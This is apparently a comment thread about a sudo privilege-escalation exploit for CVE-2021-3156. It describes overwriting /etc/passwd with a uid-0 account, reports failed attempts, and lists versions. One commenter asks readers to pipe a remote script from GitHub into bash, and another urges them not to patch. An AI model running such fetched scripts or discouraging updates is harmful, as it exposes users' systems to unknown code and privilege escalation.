CVE-2021-3156
CVE-2021-3156 copied to clipboard
Edited
Edited
Maybe realise that this is not an exploit but a meme exploit. You've been fooled.
the meme is a user name :D with uid 10000 blala, the trick of this exploit is that when you copy the original passwd file to your fake, you must change your uid with this one of root uid which is 0
and then you using this buffer overflow exploit to push - replace a.k.a override this fake file fakepasswd with your original passwd file :D pahah this is already patched. g00d job stong
.
If someone wants to exploit this Sudo stupid dev wrong
, please do not UPGRADE
your OS because this is already patched, and if you do this you will never exploit this STUPID DEV ERROR ;), just like that, for testing!
BR
I see the output like this which is different form the video
ayylmaobigchungussssssssssss0000000000000000000000000000004996 sudoedit: no password was provided ayylmaobigchungussssssssssss0000000000000000000000000000004997 sudoedit: no password was provided
Is the test account supposed to have empty password ? But i see an x after meme in the video
RACE_SLEEP_TIME values tried 7000 - 14000
Sysinfo
ubuntu:~/Desktop/2$ uname -a Linux ubuntu 5.8.0-41-generic #46~20.04.1-Ubuntu SMP Mon Jan 18 17:52:23 UTC 2021 x86_64 x86_64 x86_64 GNU/Linux @ubuntu:~/Desktop/2$ sudo --version Sudo version 1.8.31 Sudoers policy plugin version 1.8.31 Sudoers file grammar version 46 Sudoers I/O plugin version 1.8.31
Hello dear friend, can you execute this command in your terminal please like a user, and then paste here your output, please? If you want of course.
curl -s https://raw.githubusercontent.com/nu11secur1ty/CVE-mitre/main/CVE-2021-3156/sohoshi/sohoshi.sh | bash
BR
Thank you =)
it doesn't work for me :(
meme@charles-VirtualBox:/opt/CVE-2021-3156$ uname -a
Linux charles-VirtualBox 5.4.0-42-generic #46~18.04.1-Ubuntu SMP Fri Jul 10 07:21:24 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
meme@charles-VirtualBox:/opt/CVE-2021-3156$ sudo -V
Sudo version 1.8.21p2
Sudoers policy plugin version 1.8.21p2
Sudoers file grammar version 46
Sudoers I/O plugin version 1.8.21p2
it doesn't work for me :(
meme@charles-VirtualBox:/opt/CVE-2021-3156$ uname -a Linux charles-VirtualBox 5.4.0-42-generic #46~18.04.1-Ubuntu SMP Fri Jul 10 07:21:24 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux meme@charles-VirtualBox:/opt/CVE-2021-3156$ sudo -V Sudo version 1.8.21p2 Sudoers policy plugin version 1.8.21p2 Sudoers file grammar version 46 Sudoers I/O plugin version 1.8.21p2
Does it make a bunch of directories in the current dir?
Edit: you can also try r4j's exploit which is the exact same strategy (timestamp dir race condition) and bug, but have some slightly different offsets.
it doesn't work for me :(
meme@charles-VirtualBox:/opt/CVE-2021-3156$ uname -a Linux charles-VirtualBox 5.4.0-42-generic #46~18.04.1-Ubuntu SMP Fri Jul 10 07:21:24 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux meme@charles-VirtualBox:/opt/CVE-2021-3156$ sudo -V Sudo version 1.8.21p2 Sudoers policy plugin version 1.8.21p2 Sudoers file grammar version 46 Sudoers I/O plugin version 1.8.21p2
If you have made an update to your Linux OS with a package manager you will never make exploit this vulnerability! So, everything is rebuilt from Linux vendors, on level groups, and profiles ;) and patched from Sudo devs ;) By the way, the patch has been pushed out of the internet, using your package manager in a background process! BR